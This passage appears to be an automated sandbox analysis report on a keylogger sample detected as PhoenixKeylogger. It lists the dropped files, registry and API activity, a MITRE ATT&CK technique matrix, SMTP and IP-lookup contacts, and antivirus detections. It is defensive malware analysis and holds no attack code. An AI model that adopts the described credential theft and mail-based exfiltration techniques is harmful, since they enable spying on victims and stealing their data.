              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1F00B cpuid 1_2_00A1F00B
              Source: C:\Users\Public\Downloads\systems.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1D891 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_00A1D891
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0AEE5 GetVersionExW,1_2_00A0AEE5
              Source: explorer.exe, 0000001B.00000002.813821254.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.813746367.0000000000558000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.812983088.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.813794474.0000000000993000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.813008497.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.813034558.0000000001087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\192.168.2.1\all\procexp.exe
              Source: explorer.exe, 0000000E.00000002.815322303.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.812956111.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.815413482.0000000003700000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.813821254.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.812769651.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.814751799.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.813794474.0000000000993000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.816277513.0000000003500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "c:\users\user\desktop\procexp.exe

              Stealing of Sensitive Information

              barindex
              Yara detected PhoenixKeylogger
              Source: Yara matchFile source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: systems.exe PID: 2880, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Downloads\systems.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected PhoenixKeylogger
              Source: Yara matchFile source: 7.0.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.systems.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000000.289663660.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.812023863.0000000000222000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: systems.exe PID: 2880, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Downloads\systems.exe, type: DROPPED

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium1
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts12
              Scripting              		Boot or Logon Initialization Scripts112
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol1
              Screen Capture              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Native API              		Logon Script (Windows)Logon Script (Windows)12
              Scripting              		Security Account Manager36
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		Automated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts2
              Command and Scripting Interpreter              		Logon Script (Mac)Logon Script (Mac)21
              Obfuscated Files or Information              		NTDS1
              Query Registry              		Distributed Component Object ModelInput CaptureScheduled Transfer2
              Non-Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Software Packing              		LSA Secrets141
              Security Software Discovery              		SSHKeyloggingData Transfer Size Limits12
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              DLL Side-Loading              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Masquerading              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion              		Proc Filesystem1
              Application Window Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
              Process Injection              		/etc/passwd and /etc/shadow1
              Remote System Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              System Network Configuration Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 565576 Sample: 2cB42TzofC Startdate: 03/02/2022 Architecture: WINDOWS Score: 66 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 8 other signatures 2->54 8 2cB42TzofC.exe 3 8 2->8         started        11 explorer.exe 21 10 2->11         started        13 explorer.exe 2->13         started        15 5 other processes 2->15 process3 file4 38 C:\Users\Public\Downloads\systems.exe, PE32 8->38 dropped 40 C:\Users\Public\Downloads\vbs.vbs, ISO-8859 8->40 dropped 17 systems.exe 15 5 8->17         started        21 wscript.exe 1 8->21         started        process5 dnsIp6 42 smtp.gmail.com 108.177.127.108, 49718, 49721, 49722 GOOGLEUS United States 17->42 44 108.177.127.109, 49723, 49724, 49728 GOOGLEUS United States 17->44 46 2 other IPs or domains 17->46 56 Antivirus detection for dropped file 17->56 58 Multi AV Scanner detection for dropped file 17->58 60 May check the online IP address of the machine 17->60 62 2 other signatures 17->62 23 explorer.exe 1 17->23         started        25 explorer.exe 17->25         started        27 explorer.exe 17->27         started        32 5 other processes 17->32 29 cmd.exe 1 21->29         started        signatures7 process8 signatures9 64 Uses shutdown.exe to shutdown or reboot the system 29->64 34 conhost.exe 29->34         started        36 shutdown.exe 1 29->36         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              2cB42TzofC.exe82%ReversingLabsByteCode-MSIL.Backdoor.Phoenix
              2cB42TzofC.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Downloads\systems.exe100%AviraTR/ATRAPS.Gen
              C:\Users\Public\Downloads\systems.exe100%Joe Sandbox ML
              C:\Users\Public\Downloads\systems.exe89%ReversingLabsByteCode-MSIL.Backdoor.Phoenix

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              7.2.systems.exe.220000.0.unpack100%AviraTR/Dropper.GenDownload File
              7.0.systems.exe.220000.0.unpack100%AviraTR/Dropper.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.typography.netPI0%Avira URL Cloudsafe
              http://www.carterandcone.como=0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cnb50%Avira URL Cloudsafe
              http://www.fontbureau.comcomda0%Avira URL Cloudsafe
              http://www.fontbureau.comessed0%URL Reputationsafe
              http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl00%URL Reputationsafe
              http://www.founder.com.cn/cnicrz0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.founder.com.cn/cnht0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.fontbureau.comgreta0%URL Reputationsafe
              http://www.carterandcone.comSma0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/n-u0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
              http://www.fontbureau.comgrito0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://schemas.mgg0%Avira URL Cloudsafe
              http://www.fontbureau.comalic90%Avira URL Cloudsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.founder.com.cn/cnL50%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/S0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htmj0%Avira URL Cloudsafe
              http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/E0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/lic00%Avira URL Cloudsafe
              http://www.carterandcone.comt0%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              http://schemas.micr0%URL Reputationsafe
              http://www.carterandcone.comi0%URL Reputationsafe
              http://www.carterandcone.comg0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.ascendercorp.com/typedesigners.htmlw0%Avira URL Cloudsafe
              http://www.fontbureau.comFx0%Avira URL Cloudsafe
              http://www.fontbureau.comalicS0%Avira URL Cloudsafe
              http://www.fontbureau.comoitu0%URL Reputationsafe
              http://www.founder.com.cn/cn)5/0%Avira URL Cloudsafe
              http://www.fontbureau.comalsFE0%Avira URL Cloudsafe
              http://crl.pki.goog/gt0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/j0%URL Reputationsafe
              http://www.founder.com.cn/cn/R80%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/a0%URL Reputationsafe
              http://www.carterandcone.comON0%Avira URL Cloudsafe
              http://www.carterandcone.comsig0%Avira URL Cloudsafe
              http://www.founder.com.cn/cnP5-0%Avira URL Cloudsafe
              http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/rtr0%Avira URL Cloudsafe
              http://www.carterandcone.comn-u0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/E0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.founder.com.cn/cn;0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/90%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://schemas.mDD0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.carterandcone.comD0%URL Reputationsafe
              http://www.typography.net0%URL Reputationsafe
              http://www.fontbureau.comcom0%URL Reputationsafe
              http://schemas.mZ0%Avira URL Cloudsafe
              http://www.founder.com.cn/cnn-u0%URL Reputationsafe
              http://www.fontbureau.comrsiv0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.typography.net(0%Avira URL Cloudsafe
              http://www.fontbureau.comdu0%Avira URL Cloudsafe
              http://www.fontbureau.comF0%URL Reputationsafe
              http://www.carterandcone.comTC0%URL Reputationsafe
              http://www.carterandcone.comTex0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/g20%Avira URL Cloudsafe
              http://www.fontbureau.comda0%Avira URL Cloudsafe
              http://en.wikipedia0%URL Reputationsafe
              http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
              http://www.sandoll.co.krus0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ifconfig.me
              		34.117.59.81
              		truefalse
                		high
                smtp.gmail.com
                		108.177.127.108
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ifconfig.me/ipfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.typography.netPIsystems.exe, 00000007.00000003.409043945.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409317684.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.carterandcone.como=systems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.zhongyicts.com.cnb5systems.exe, 00000007.00000003.414673072.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.comcomdasystems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designerssystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comessedsystems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457758116.0000000006177000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818255606.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnicrzsystems.exe, 00000007.00000003.413417698.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
